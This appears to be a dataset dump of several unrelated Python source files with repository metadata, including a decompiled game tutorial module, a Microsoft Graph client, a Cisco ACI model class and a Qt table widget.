        # only by padding, so the answer must come from the encoder state.
        src = word + 'P' * (n_step - len(word))
        enc_input = torch.FloatTensor([np.eye(n_class)[[num_dic[c] for c in src]]])
        dec_input = torch.FloatTensor([np.eye(n_class)[[num_dic[c] for c in 'S' + 'P' * n_step]]])
        hidden = torch.zeros(1, 1, n_hidden)
        output = model(enc_input, hidden, dec_input)
        # output: [n_step+1, 1, n_class]; take the best class per time step.
        predict = output.data.max(2, keepdim=True)[1]
        decoded = [char_arr[int(i)] for i in predict.view(-1)]
        translated = ''.join(decoded)
        # Robustness: only truncate at 'E' if the model actually emitted one.
        if 'E' in translated:
            translated = translated[:translated.index('E')]
        return translated.replace('P', '')

    print('test')
    print('man ->', translate('man'))
    print('mans ->', translate('mans'))
    print('king ->', translate('king'))
    print('black ->', translate('black'))
    print('upp ->', translate('upp'))
"nlkey2022@gmail.com"
] | nlkey2022@gmail.com |
c21487e95047e7209880aab4b11f9873f8316f2f | 518d911a66485947c5d336e96a842f162ef9caf1 | /res/scripts/client/tutorial/control/battle/context.py | 60e1e8e996bdcfac10af60694026e7022c73417e | [] | no_license | wotmods/WOTDecompiled | 84b8e5d32ee73e1356b4d57318eb76dfac6b5220 | 45fd599666c55cb871f6b84b0ec977b9d4baf469 | refs/heads/master | 2020-12-25T21:34:26.096544 | 2014-11-05T13:58:39 | 2014-11-05T13:58:39 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,653 | py | # 2014.10.18 14:44:36 Central European Daylight Time
#Embedded file name: scripts/client/tutorial/control/battle/context.py
import BigWorld, FMOD
from collections import namedtuple
import struct
from constants import ARENA_GUI_TYPE
from tutorial.control import context
from tutorial.control.context import ClientCtx, GlobalStorage
from tutorial.logger import LOG_DEBUG, LOG_ERROR, LOG_WARNING
import SoundGroups
# Field names serialized into/out of Avatar.clientCtx (see BattleClientCtx).
BATTLE_RECORDS = ['completed',
 'failed',
 'accCompleted',
 'startedAt',
 'chapterIdx']
# Extra arena-derived fields added by ExtendedBattleClientCtx.fetch.
EXTENDED_BATTLE_RECORDS = ['playerTeam',
 'winnerTeam',
 'finishReason',
 'vTypeCD',
 'arenaTypeID',
 'arenaUniqueID']
ALL_BATTLE_RECORDS = BATTLE_RECORDS + EXTENDED_BATTLE_RECORDS
# struct format strings matching the field lists above:
# '3ifh'     -> 3 ints (completed, failed, accCompleted), float (startedAt),
#               short (chapterIdx).
# '3if4h2iQ' -> the five fields above plus 3 more shorts (playerTeam,
#               winnerTeam, finishReason), 2 ints (vTypeCD, arenaTypeID) and
#               an unsigned 64-bit arenaUniqueID ('Q').
BATTLE_RECORDS_FORMAT = '3ifh'
ALL_BATTLE_RECORDS_FORMAT = '3if4h2iQ'
# Symbolic string constants for tutorial training outcomes.
class TRAINING_RESULT_KEY:
    FINISHED = 'finished'
    FAILED = 'failed'


# Symbolic string constants describing why the tutorial battle ended.
class TRAINING_FINISH_REASON_KEY:
    FINISHED = 'finished'
    FAILED = 'failed'
    TIMEOUT = 'timeout'
    EXTERMINATION = 'extermination'
class BattleClientCtx(ClientCtx, namedtuple('BattleClientCtx', BATTLE_RECORDS)):
    """Immutable tutorial-progress record round-tripped through Avatar.clientCtx.

    The record is a packed struct (BATTLE_RECORDS_FORMAT). Because the tuple
    is immutable, every mutator builds a new instance via _replace, attempts
    to persist it with _store, and returns the new instance on success (or
    `self` if persisting failed).
    """

    @classmethod
    def _makeDefault(cls):
        # Field order: completed, failed, accCompleted, startedAt, chapterIdx.
        return cls.__new__(cls, 0, -1, -1, 0.0, -1)

    @classmethod
    def makeCtx(cls, record):
        """Unpacks a BATTLE_RECORDS_FORMAT byte string; defaults on bad data."""
        result = cls._makeDefault()
        if record is not None and len(record):
            try:
                result = cls._make(struct.unpack(BATTLE_RECORDS_FORMAT, record))
            except struct.error:
                LOG_ERROR('Client ctx is not valid', record)

        return result

    @classmethod
    def fetch(cls, *args):
        """Reads the current record off the player avatar (defaults if absent)."""
        player = BigWorld.player()
        if player is None or not hasattr(player, 'clientCtx'):
            LOG_DEBUG('Avatar.clientCtx not found', player)
            result = cls._makeDefault()
        else:
            result = cls.makeCtx(player.clientCtx)
        return result

    def _store(self):
        """Writes this record back to the avatar; returns False if impossible."""
        record = self.makeRecord()
        player = BigWorld.player()
        if player is None or not hasattr(player, 'storeClientCtx'):
            LOG_DEBUG('Avatar.storeClientCtx not found', player)
            return False
        player.storeClientCtx(record)
        return True

    def makeRecord(self):
        """Packs this record into the BATTLE_RECORDS_FORMAT byte string."""
        return struct.pack(BATTLE_RECORDS_FORMAT, *self)

    def addMask(self, mask, done = True):
        """ORs `mask` into the completed (done) or failed bitfield and persists."""
        completed = self.completed
        failed = self.failed
        if done:
            completed |= mask
        else:
            failed |= mask
        newCtx = self._replace(completed=completed, failed=failed)
        if newCtx._store():
            return newCtx
        return self

    def setChapterIdx(self, chapterIdx):
        """Persists a new chapter index; returns the stored instance."""
        newCtx = self._replace(chapterIdx=chapterIdx)
        if newCtx._store():
            return newCtx
        return self

    def setAccCompleted(self, accCompleted):
        """Persists the account-level completion bitfield."""
        newCtx = self._replace(accCompleted=accCompleted)
        if newCtx._store():
            return newCtx
        return self

    def setStartedAt(self, time):
        """Persists the training start timestamp."""
        newCtx = self._replace(startedAt=time)
        if newCtx._store():
            return newCtx
        return self
class ExtendedBattleClientCtx(ClientCtx, namedtuple('ExtendedBattleClientCtx', ALL_BATTLE_RECORDS)):
    """BattleClientCtx extended with arena/vehicle details gathered client-side.

    Unlike BattleClientCtx this record is assembled on fetch: the base fields
    come from Avatar.clientCtx, the extended ones are read from the current
    arena state when available.
    """

    @classmethod
    def _makeDefault(cls):
        # Defaults for all ALL_BATTLE_RECORDS fields, in declaration order.
        return cls.__new__(cls, 0, -1, -1, 0.0, -1, 1, 2, -1, -1, -1, -1)

    @classmethod
    def makeCtx(cls, record):
        """Unpacks an ALL_BATTLE_RECORDS_FORMAT byte string; defaults on bad data."""
        result = cls._makeDefault()
        if record is not None and len(record):
            try:
                result = cls._make(struct.unpack(ALL_BATTLE_RECORDS_FORMAT, record))
            except struct.error:
                LOG_ERROR('Client ctx is not valid', record)

        return result

    @classmethod
    def fetch(cls, *args):
        """Builds the full record from the avatar context plus live arena data."""
        params = ExtendedBattleClientCtx._makeDefault()._asdict()
        player = BigWorld.player()
        # Base tutorial-progress fields come straight from the avatar record.
        params.update(BattleClientCtx.fetch()._asdict())
        arena = getattr(player, 'arena', None)
        if arena is not None:
            # periodAdditionalInfo carries (winnerTeam, finishReason) once the
            # battle period has ended.
            info = arena.periodAdditionalInfo
            if info is not None and len(info) > 1:
                params['winnerTeam'] = info[0]
                params['finishReason'] = info[1]
            params['arenaUniqueID'] = arena.arenaUniqueID
            arenaType = arena.arenaType
            if arenaType is not None:
                params['arenaTypeID'] = arenaType.id
            pVehID = getattr(player, 'playerVehicleID', None)
            vehicles = arena.vehicles
            if pVehID in vehicles:
                vDescriptor = vehicles[pVehID]['vehicleType']
                if vDescriptor is not None:
                    params['vTypeCD'] = vDescriptor.type.compactDescr
        params['playerTeam'] = getattr(player, 'team', 1)
        LOG_DEBUG('All records in context', params)
        return ExtendedBattleClientCtx(**params)

    def makeRecord(self):
        """Packs this record into the ALL_BATTLE_RECORDS_FORMAT byte string."""
        return struct.pack(ALL_BATTLE_RECORDS_FORMAT, *self)
class BattleStartReqs(context.StartReqs):
    """Start requirements for the in-battle tutorial: tutorial arenas only."""

    def isEnabled(self):
        arena = getattr(BigWorld.player(), 'arena', None)
        if arena is None:
            return False
        return arena.guiType == ARENA_GUI_TYPE.TUTORIAL

    def process(self):
        loader, ctx = self._flush()
        # Seed the run context with the bonuses already completed this battle.
        ctx.bonusCompleted = BattleClientCtx.fetch().completed
        GlobalStorage.clearVars()
        loader._doRun(ctx)
class BattleBonusesRequester(context.BonusesRequester):
    """Marks chapter bonuses as taken and pushes progress to the GUI."""

    def request(self, chapterID = None):
        """Records the chapter's bonus bit in the shared client context."""
        chapter = self.getChapter(chapterID=chapterID)
        if chapter is None:
            LOG_ERROR('Chapter not found', chapterID)
            return
        if not chapter.hasBonus():
            LOG_ERROR('Chapter has not bonus', chapter.getID())
            return
        bonusID = chapter.getBonusID()
        bonusMask = 1 << bonusID
        # Persist the bit immediately; the updated context drives the progress bar.
        updatedCtx = BattleClientCtx.fetch().addMask(bonusMask)
        if chapter.isBonusReceived(self._completed):
            LOG_DEBUG('Bonus already received', chapter.getID(), self._completed)
            self._isReceived = True
            return
        LOG_DEBUG('Received bonus', bonusID)
        self._completed |= bonusMask
        self._gui.setTrainingProgress(
            self._tutorial._descriptor.getProgress(updatedCtx.completed))
class BattleSoundPlayer(context.SoundPlayer):
    """Plays tutorial GUI jingles and queued voice-over ("speaking") sounds.

    Only one voice-over plays at a time: a request arriving while another is
    playing is remembered and started when the current one finishes. Each
    sound ID that has been spoken is recorded so it is not replayed within
    the same chapter.
    """
    # Maps abstract tutorial sound events to FMOD event paths.
    __guiSounds = {context.SOUND_EVENT.TASK_FAILED: '/GUI/notifications_FX/task_new',
     context.SOUND_EVENT.TASK_COMPLETED: '/GUI/notifications_FX/task_complete',
     context.SOUND_EVENT.NEXT_CHAPTER: '/GUI/notifications_FX/task_part_complete'}

    def __init__(self):
        super(BattleSoundPlayer, self).__init__()
        self.__ignoreNext = False
        self.__speakSnd = None
        # Fix: the original initialized/cleared `__nextSpeakID` while the
        # queueing logic in _speak used `__nextSndID`, so stop() never
        # discarded a pending voice-over and a stale one could start playing
        # after a later sound finished. A single attribute is used now.
        self.__nextSndID = None
        # ID of the voice-over most recently started (for isPlaying checks).
        self.__lastSpeakID = None
        self.__prevSpeaks = set()

    def play(self, event, sndID = None):
        if self.isMuted():
            return
        if event in self.__guiSounds.keys():
            self._playGUI(event)
        elif event is context.SOUND_EVENT.SPEAKING:
            self._speak(sndID)
        else:
            LOG_WARNING('Sound event is not supported', event)

    def stop(self):
        self._clear()
        self.__ignoreNext = False
        self.__nextSndID = None
        self.__lastSpeakID = None
        self.__prevSpeaks.clear()

    def isPlaying(self, event, sndID = None):
        result = False
        if event is context.SOUND_EVENT.SPEAKING:
            if self.__speakSnd is not None:
                if sndID is not None:
                    # Fix: the original compared against list(set)[-1], whose
                    # order is undefined; track the last started ID explicitly.
                    result = self.__lastSpeakID == sndID
                else:
                    result = True
        else:
            LOG_WARNING('Sound event is not supported', event)
        return result

    def goToNextChapter(self):
        # Allow already-heard voice-overs to play again in the new chapter.
        self.__prevSpeaks.clear()

    def _playGUI(self, event):
        # NEXT_CHAPTER plays itself but suppresses the immediately following
        # GUI sound (ignoreNext).
        if self.__ignoreNext:
            self.__ignoreNext = False
            return
        if event is context.SOUND_EVENT.NEXT_CHAPTER:
            self.__ignoreNext = True
        sndID = self.__guiSounds[event]
        sound = SoundGroups.g_instance.FMODgetSound(sndID)
        if sound:
            sound.play()
        else:
            LOG_ERROR('Sound not found', sndID)

    def _clear(self):
        # Detach the finish callback before stopping to avoid re-entrancy.
        if self.__speakSnd is not None:
            self.__speakSnd.setCallback('EVENTFINISHED', None)
            self.__speakSnd.stop()
            self.__speakSnd = None

    def _speak(self, sndID):
        if sndID in self.__prevSpeaks:
            LOG_DEBUG('Speaking played, ignore', sndID)
            return
        if sndID is None:
            LOG_WARNING('Sound ID for speaking is not defined')
            return
        if self.__speakSnd is not None:
            # Busy: remember the request; it is started from __onSpeakingStop.
            self.__nextSndID = sndID
            return
        sound = SoundGroups.g_instance.FMODgetSound(sndID)
        if not sound:
            LOG_ERROR('Sound not found', sndID)
            return
        self.__nextSndID = None
        self.__speakSnd = sound
        self.__lastSpeakID = sndID
        self.__prevSpeaks.add(sndID)
        sound.setCallback('EVENTFINISHED', self.__onSpeakingStop)
        sound.play()

    def __onSpeakingStop(self, sound):
        LOG_DEBUG('Stop playing sound by event', sound)
        self._clear()
        if self.__nextSndID is not None:
            self._speak(self.__nextSndID)
+++ okay decompyling res/scripts/client/tutorial/control/battle/context.pyc
# decompiled 1 files: 1 okay, 0 failed, 0 verify failed
# 2014.10.18 14:44:36 Central European Daylight Time
| [
"chodakk@RWAMWCOE31488.emea.roche.com"
] | chodakk@RWAMWCOE31488.emea.roche.com |
d82aacb1766a56a6ec366a413244151cecbedd3f | 6364bb727b623f06f6998941299c49e7fcb1d437 | /msgraph-cli-extensions/src/reports/azext_reports/vendored_sdks/reports/aio/_reports_async.py | 1d9d705411e28f9c5eacf93474eb657f3973b795 | [
"MIT"
] | permissive | kanakanaidu/msgraph-cli | 1d6cd640f4e10f4bdf476d44d12a7c48987b1a97 | b3b87f40148fb691a4c331f523ca91f8a5cc9224 | refs/heads/main | 2022-12-25T08:08:26.716914 | 2020-09-23T14:29:13 | 2020-09-23T14:29:13 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,260 | py | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import Any, Optional, TYPE_CHECKING
from azure.mgmt.core import AsyncARMPipelineClient
from msrest import Deserializer, Serializer
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from azure.core.credentials_async import AsyncTokenCredential
from ._configuration_async import ReportsConfiguration
from .operations_async import ReportReportRootOperations
from .operations_async import ReportOperations
from .. import models
class Reports(object):
    """Reports.

    :ivar report_report_root: ReportReportRootOperations operations
    :vartype report_report_root: reports.aio.operations_async.ReportReportRootOperations
    :ivar report: ReportOperations operations
    :vartype report: reports.aio.operations_async.ReportOperations
    :param credential: Credential needed for the client to connect to Azure.
    :type credential: ~azure.core.credentials_async.AsyncTokenCredential
    :param top: Show only the first n items.
    :type top: int
    :param skip: Skip the first n items.
    :type skip: int
    :param search: Search items by search phrases.
    :type search: str
    :param filter: Filter items by property values.
    :type filter: str
    :param count: Include count of items.
    :type count: bool
    :param str base_url: Service URL
    :keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
    """

    def __init__(
        self,
        credential: "AsyncTokenCredential",
        top: Optional[int] = None,
        skip: Optional[int] = None,
        search: Optional[str] = None,
        filter: Optional[str] = None,
        count: Optional[bool] = None,
        base_url: Optional[str] = None,
        **kwargs: Any
    ) -> None:
        # Default to the Microsoft Graph beta endpoint when none is supplied.
        if not base_url:
            base_url = 'https://graph.microsoft.com/beta'
        self._config = ReportsConfiguration(credential, top, skip, search, filter, count, **kwargs)
        self._client = AsyncARMPipelineClient(base_url=base_url, config=self._config, **kwargs)

        # (De)serializers share the generated model catalog (classes only).
        client_models = {k: v for k, v in models.__dict__.items() if isinstance(v, type)}
        self._serialize = Serializer(client_models)
        self._deserialize = Deserializer(client_models)

        # Operation groups exposed on this client.
        self.report_report_root = ReportReportRootOperations(
            self._client, self._config, self._serialize, self._deserialize)
        self.report = ReportOperations(
            self._client, self._config, self._serialize, self._deserialize)

    async def close(self) -> None:
        # Dispose of the underlying HTTP pipeline.
        await self._client.close()

    async def __aenter__(self) -> "Reports":
        await self._client.__aenter__()
        return self

    async def __aexit__(self, *exc_details) -> None:
        await self._client.__aexit__(*exc_details)
| [
"japhethobalak@gmail.com"
] | japhethobalak@gmail.com |
8bc2526d1210aaeeddc5332487c6db2726415489 | f4b60f5e49baf60976987946c20a8ebca4880602 | /lib/python2.7/site-packages/acimodel-1.3_2j-py2.7.egg/cobra/modelimpl/proc/memhist5min.py | 0b28165a7e907ca15861ca5e0d33a7e10d87c977 | [] | no_license | cqbomb/qytang_aci | 12e508d54d9f774b537c33563762e694783d6ba8 | a7fab9d6cda7fadcc995672e55c0ef7e7187696e | refs/heads/master | 2022-12-21T13:30:05.240231 | 2018-12-04T01:46:53 | 2018-12-04T01:46:53 | 159,911,666 | 0 | 0 | null | 2022-12-07T23:53:02 | 2018-12-01T05:17:50 | Python | UTF-8 | Python | false | false | 10,846 | py | # coding=UTF-8
# **********************************************************************
# Copyright (c) 2013-2016 Cisco Systems, Inc. All rights reserved
# written by zen warriors, do not modify!
# **********************************************************************
from cobra.mit.meta import ClassMeta
from cobra.mit.meta import StatsClassMeta
from cobra.mit.meta import CounterMeta
from cobra.mit.meta import PropMeta
from cobra.mit.meta import Category
from cobra.mit.meta import SourceRelationMeta
from cobra.mit.meta import NamedSourceRelationMeta
from cobra.mit.meta import TargetRelationMeta
from cobra.mit.meta import DeploymentPathMeta, DeploymentCategory
from cobra.model.category import MoCategory, PropCategory, CounterCategory
from cobra.mit.mo import Mo
# ##################################################
class MemHist5min(Mo):
    """
    A class that represents historical statistics for memory in a 5 minute sampling interval. This class updates every 10 seconds.
    """

    # Auto-generated cobra metadata (see the "do not modify" file header):
    # a single gauge counter ("current", in bytes) whose implicit
    # min/max/avg/suspect/thresholded/trend values map to the properties
    # registered further down.
    meta = StatsClassMeta("cobra.model.proc.MemHist5min", "memory")

    counter = CounterMeta("current", CounterCategory.GAUGE, "bytes", "memory allocated")
    counter._propRefs[PropCategory.IMPLICIT_MIN] = "currentMin"
    counter._propRefs[PropCategory.IMPLICIT_MAX] = "currentMax"
    counter._propRefs[PropCategory.IMPLICIT_AVG] = "currentAvg"
    counter._propRefs[PropCategory.IMPLICIT_SUSPECT] = "currentSpct"
    counter._propRefs[PropCategory.IMPLICIT_THRESHOLDED] = "currentThr"
    counter._propRefs[PropCategory.IMPLICIT_TREND] = "currentTr"
    meta._counters.append(counter)

    # Managed-object identity: class name, relative-name format and flags.
    meta.moClassName = "procMemHist5min"
    meta.rnFormat = "HDprocMem5min-%(index)s"
    meta.category = MoCategory.STATS_HISTORY
    meta.label = "historical memory stats in 5 minute"
    meta.writeAccessMask = 0x1
    meta.readAccessMask = 0x1
    meta.isDomainable = False
    meta.isReadOnly = True
    meta.isConfigurable = False
    meta.isDeletable = False
    meta.isContextRoot = False

    meta.parentClasses.add("cobra.model.proc.Entity")
    meta.parentClasses.add("cobra.model.proc.Entry")

    meta.superClasses.add("cobra.model.stats.Item")
    meta.superClasses.add("cobra.model.stats.Hist")
    meta.superClasses.add("cobra.model.proc.MemHist")

    meta.rnPrefixes = [
        ('HDprocMem5min-', True),
    ]

    prop = PropMeta("str", "childAction", "childAction", 4, PropCategory.CHILD_ACTION)
    prop.label = "None"
    prop.isImplicit = True
    prop.isAdmin = True
    prop._addConstant("deleteAll", "deleteall", 16384)
    prop._addConstant("deleteNonPresent", "deletenonpresent", 8192)
    prop._addConstant("ignore", "ignore", 4096)
    meta.props.add("childAction", prop)

    prop = PropMeta("str", "cnt", "cnt", 16212, PropCategory.REGULAR)
    prop.label = "Number of Collections During this Interval"
    prop.isImplicit = True
    prop.isAdmin = True
    meta.props.add("cnt", prop)

    prop = PropMeta("str", "currentAvg", "currentAvg", 10497, PropCategory.IMPLICIT_AVG)
    prop.label = "memory allocated average value"
    prop.isOper = True
    prop.isStats = True
    meta.props.add("currentAvg", prop)

    prop = PropMeta("str", "currentMax", "currentMax", 10496, PropCategory.IMPLICIT_MAX)
    prop.label = "memory allocated maximum value"
    prop.isOper = True
    prop.isStats = True
    meta.props.add("currentMax", prop)

    prop = PropMeta("str", "currentMin", "currentMin", 10495, PropCategory.IMPLICIT_MIN)
    prop.label = "memory allocated minimum value"
    prop.isOper = True
    prop.isStats = True
    meta.props.add("currentMin", prop)

    prop = PropMeta("str", "currentSpct", "currentSpct", 10498, PropCategory.IMPLICIT_SUSPECT)
    prop.label = "memory allocated suspect count"
    prop.isOper = True
    prop.isStats = True
    meta.props.add("currentSpct", prop)

    # Thresholded flags: a bitmask combining (statistic kind) x (severity /
    # threshold-crossing state); each named constant below is one bit value.
    prop = PropMeta("str", "currentThr", "currentThr", 10499, PropCategory.IMPLICIT_THRESHOLDED)
    prop.label = "memory allocated thresholded flags"
    prop.isOper = True
    prop.isStats = True
    prop.defaultValue = 0
    prop.defaultValueStr = "unspecified"
    prop._addConstant("avgCrit", "avg-severity-critical", 2199023255552)
    prop._addConstant("avgHigh", "avg-crossed-high-threshold", 68719476736)
    prop._addConstant("avgLow", "avg-crossed-low-threshold", 137438953472)
    prop._addConstant("avgMajor", "avg-severity-major", 1099511627776)
    prop._addConstant("avgMinor", "avg-severity-minor", 549755813888)
    prop._addConstant("avgRecovering", "avg-recovering", 34359738368)
    prop._addConstant("avgWarn", "avg-severity-warning", 274877906944)
    prop._addConstant("cumulativeCrit", "cumulative-severity-critical", 8192)
    prop._addConstant("cumulativeHigh", "cumulative-crossed-high-threshold", 256)
    prop._addConstant("cumulativeLow", "cumulative-crossed-low-threshold", 512)
    prop._addConstant("cumulativeMajor", "cumulative-severity-major", 4096)
    prop._addConstant("cumulativeMinor", "cumulative-severity-minor", 2048)
    prop._addConstant("cumulativeRecovering", "cumulative-recovering", 128)
    prop._addConstant("cumulativeWarn", "cumulative-severity-warning", 1024)
    prop._addConstant("lastReadingCrit", "lastreading-severity-critical", 64)
    prop._addConstant("lastReadingHigh", "lastreading-crossed-high-threshold", 2)
    prop._addConstant("lastReadingLow", "lastreading-crossed-low-threshold", 4)
    prop._addConstant("lastReadingMajor", "lastreading-severity-major", 32)
    prop._addConstant("lastReadingMinor", "lastreading-severity-minor", 16)
    prop._addConstant("lastReadingRecovering", "lastreading-recovering", 1)
    prop._addConstant("lastReadingWarn", "lastreading-severity-warning", 8)
    prop._addConstant("maxCrit", "max-severity-critical", 17179869184)
    prop._addConstant("maxHigh", "max-crossed-high-threshold", 536870912)
    prop._addConstant("maxLow", "max-crossed-low-threshold", 1073741824)
    prop._addConstant("maxMajor", "max-severity-major", 8589934592)
    prop._addConstant("maxMinor", "max-severity-minor", 4294967296)
    prop._addConstant("maxRecovering", "max-recovering", 268435456)
    prop._addConstant("maxWarn", "max-severity-warning", 2147483648)
    prop._addConstant("minCrit", "min-severity-critical", 134217728)
    prop._addConstant("minHigh", "min-crossed-high-threshold", 4194304)
    prop._addConstant("minLow", "min-crossed-low-threshold", 8388608)
    prop._addConstant("minMajor", "min-severity-major", 67108864)
    prop._addConstant("minMinor", "min-severity-minor", 33554432)
    prop._addConstant("minRecovering", "min-recovering", 2097152)
    prop._addConstant("minWarn", "min-severity-warning", 16777216)
    prop._addConstant("periodicCrit", "periodic-severity-critical", 1048576)
    prop._addConstant("periodicHigh", "periodic-crossed-high-threshold", 32768)
    prop._addConstant("periodicLow", "periodic-crossed-low-threshold", 65536)
    prop._addConstant("periodicMajor", "periodic-severity-major", 524288)
    prop._addConstant("periodicMinor", "periodic-severity-minor", 262144)
    prop._addConstant("periodicRecovering", "periodic-recovering", 16384)
    prop._addConstant("periodicWarn", "periodic-severity-warning", 131072)
    prop._addConstant("rateCrit", "rate-severity-critical", 36028797018963968)
    prop._addConstant("rateHigh", "rate-crossed-high-threshold", 1125899906842624)
    prop._addConstant("rateLow", "rate-crossed-low-threshold", 2251799813685248)
    prop._addConstant("rateMajor", "rate-severity-major", 18014398509481984)
    prop._addConstant("rateMinor", "rate-severity-minor", 9007199254740992)
    prop._addConstant("rateRecovering", "rate-recovering", 562949953421312)
    prop._addConstant("rateWarn", "rate-severity-warning", 4503599627370496)
    prop._addConstant("trendCrit", "trend-severity-critical", 281474976710656)
    prop._addConstant("trendHigh", "trend-crossed-high-threshold", 8796093022208)
    prop._addConstant("trendLow", "trend-crossed-low-threshold", 17592186044416)
    prop._addConstant("trendMajor", "trend-severity-major", 140737488355328)
    prop._addConstant("trendMinor", "trend-severity-minor", 70368744177664)
    prop._addConstant("trendRecovering", "trend-recovering", 4398046511104)
    prop._addConstant("trendWarn", "trend-severity-warning", 35184372088832)
    prop._addConstant("unspecified", None, 0)
    meta.props.add("currentThr", prop)

    prop = PropMeta("str", "currentTr", "currentTr", 10500, PropCategory.IMPLICIT_TREND)
    prop.label = "memory allocated trend"
    prop.isOper = True
    prop.isStats = True
    meta.props.add("currentTr", prop)

    prop = PropMeta("str", "dn", "dn", 1, PropCategory.DN)
    prop.label = "None"
    prop.isDn = True
    prop.isImplicit = True
    prop.isAdmin = True
    prop.isCreateOnly = True
    meta.props.add("dn", prop)

    # "index" is the only naming property (used in the rn format above).
    prop = PropMeta("str", "index", "index", 7037, PropCategory.REGULAR)
    prop.label = "History Index"
    prop.isConfig = True
    prop.isAdmin = True
    prop.isCreateOnly = True
    prop.isNaming = True
    meta.props.add("index", prop)

    prop = PropMeta("str", "lastCollOffset", "lastCollOffset", 111, PropCategory.REGULAR)
    prop.label = "Collection Length"
    prop.isImplicit = True
    prop.isAdmin = True
    meta.props.add("lastCollOffset", prop)

    prop = PropMeta("str", "modTs", "modTs", 7, PropCategory.REGULAR)
    prop.label = "None"
    prop.isImplicit = True
    prop.isAdmin = True
    prop.defaultValue = 0
    prop.defaultValueStr = "never"
    prop._addConstant("never", "never", 0)
    meta.props.add("modTs", prop)

    prop = PropMeta("str", "repIntvEnd", "repIntvEnd", 110, PropCategory.REGULAR)
    prop.label = "Reporting End Time"
    prop.isImplicit = True
    prop.isAdmin = True
    meta.props.add("repIntvEnd", prop)

    prop = PropMeta("str", "repIntvStart", "repIntvStart", 109, PropCategory.REGULAR)
    prop.label = "Reporting Start Time"
    prop.isImplicit = True
    prop.isAdmin = True
    meta.props.add("repIntvStart", prop)

    prop = PropMeta("str", "rn", "rn", 2, PropCategory.RN)
    prop.label = "None"
    prop.isRn = True
    prop.isImplicit = True
    prop.isAdmin = True
    prop.isCreateOnly = True
    meta.props.add("rn", prop)

    prop = PropMeta("str", "status", "status", 3, PropCategory.STATUS)
    prop.label = "None"
    prop.isImplicit = True
    prop.isAdmin = True
    prop._addConstant("created", "created", 2)
    prop._addConstant("deleted", "deleted", 8)
    prop._addConstant("modified", "modified", 4)
    meta.props.add("status", prop)

    meta.namingProps.append(getattr(meta.props, "index"))

    def __init__(self, parentMoOrDn, index, markDirty=True, **creationProps):
        # index is the naming property; it becomes part of the object's rn/dn.
        namingVals = [index]
        Mo.__init__(self, parentMoOrDn, markDirty, *namingVals, **creationProps)
# End of package file
# ##################################################
| [
"collinsctk@qytang.com"
] | collinsctk@qytang.com |
f45a309ca55db005180c288b1341b2cd7fc07019 | 7b556e8c35668a336e381ca30c61110408abf69e | /HSTB/kluster/gui/kluster_projectview.py | 47e50d3ab1e6f3fd279ded5446d78fac100deb56 | [
"CC0-1.0"
] | permissive | OceanXplorer/kluster | 54775c3c4a93d9d51609248005271b1d7d7529c1 | bffddca5de7fd1a0eb8d5bf6b87252b84adc0636 | refs/heads/master | 2023-03-15T14:22:51.569255 | 2021-03-18T21:27:11 | 2021-03-18T21:27:11 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 13,560 | py | from datetime import datetime, timezone
from HSTB.kluster.gui.backends._qt import QtGui, QtCore, QtWidgets, Signal
from collections import OrderedDict
import os
from HSTB.kluster.fqpr_generation import Fqpr
from HSTB.kluster.fqpr_project import FqprProject
from HSTB.kluster.gui.common_widgets import CollapsibleWidget
from HSTB.shared import RegistryHelpers
class MultibeamTable(QtWidgets.QWidget):
    """
    Widget wrapping a QTableWidget that lists every multibeam file in the
    project together with its start and end times (displayed in UTC).
    """

    def __init__(self, multibeam_dict: dict, *args, **kwargs):
        super().__init__(*args, **kwargs)
        self.vlayout = QtWidgets.QVBoxLayout()
        self.table = QtWidgets.QTableWidget()
        self.vlayout.addWidget(self.table)
        self.setLayout(self.vlayout)

        # Single-row selection, sortable columns; first column stretches.
        self.table.setSortingEnabled(True)
        self.table.setSelectionMode(QtWidgets.QAbstractItemView.SingleSelection)
        self.table.setSelectionBehavior(QtWidgets.QAbstractItemView.SelectRows)
        self.table.setColumnCount(3)
        for column, column_width in enumerate((350, 200, 200)):
            self.table.setColumnWidth(column, column_width)
        self.table.setHorizontalHeaderLabels(['Multibeam File Name', 'Multibeam Start Time', 'Multibeam End Time'])
        self.table.horizontalHeader().setSectionResizeMode(0, QtWidgets.QHeaderView.Stretch)

        self.multibeam_dict = multibeam_dict
        self.populate()
        self.setMinimumHeight(600)
        self.vlayout.layout()

    def populate(self):
        """Append one row per multibeam file: name, start time, end time (UTC)."""
        def _utc_string(epoch_seconds):
            # epoch seconds -> locale-formatted UTC timestamp
            return datetime.fromtimestamp(epoch_seconds, tz=timezone.utc).strftime('%c')

        for mbesfile, times in self.multibeam_dict.items():
            row = self.table.rowCount()
            self.table.insertRow(row)
            self.table.setItem(row, 0, QtWidgets.QTableWidgetItem(mbesfile))
            self.table.setItem(row, 1, QtWidgets.QTableWidgetItem(_utc_string(times[0])))
            self.table.setItem(row, 2, QtWidgets.QTableWidgetItem(_utc_string(times[1])))
class StatusTable(QtWidgets.QWidget):
    """
    Widget wrapping a QTableWidget with the processed-sounding status counts
    for each sector (SerialNumber_SectorNumber_Frequency) in the project.
    """

    def __init__(self, status_dict: dict, *args, **kwargs):
        super().__init__(*args, **kwargs)
        self.vlayout = QtWidgets.QVBoxLayout()
        self.table = QtWidgets.QTableWidget()
        self.vlayout.addWidget(self.table)
        self.setLayout(self.vlayout)

        self.table.setSortingEnabled(True)
        self.table.setSelectionMode(QtWidgets.QAbstractItemView.SingleSelection)
        self.table.setSelectionBehavior(QtWidgets.QAbstractItemView.SelectRows)

        self.status_dict = status_dict
        # Header: sector identifier first, then one column per status key,
        # taken from the first sector entry (all entries share the same keys).
        first_sector = list(self.status_dict)[0]
        self.headr = ['SerialNumber_SectorNumber_Frequency'] + list(self.status_dict[first_sector].keys())
        self.table.setColumnCount(len(self.headr))
        self.table.setColumnWidth(0, 250)
        for status_column in range(1, len(self.headr)):
            self.table.setColumnWidth(status_column, 100)
        self.table.setHorizontalHeaderLabels(self.headr)
        self.populate()
        self.setMinimumHeight(300)
        self.vlayout.layout()

    def populate(self):
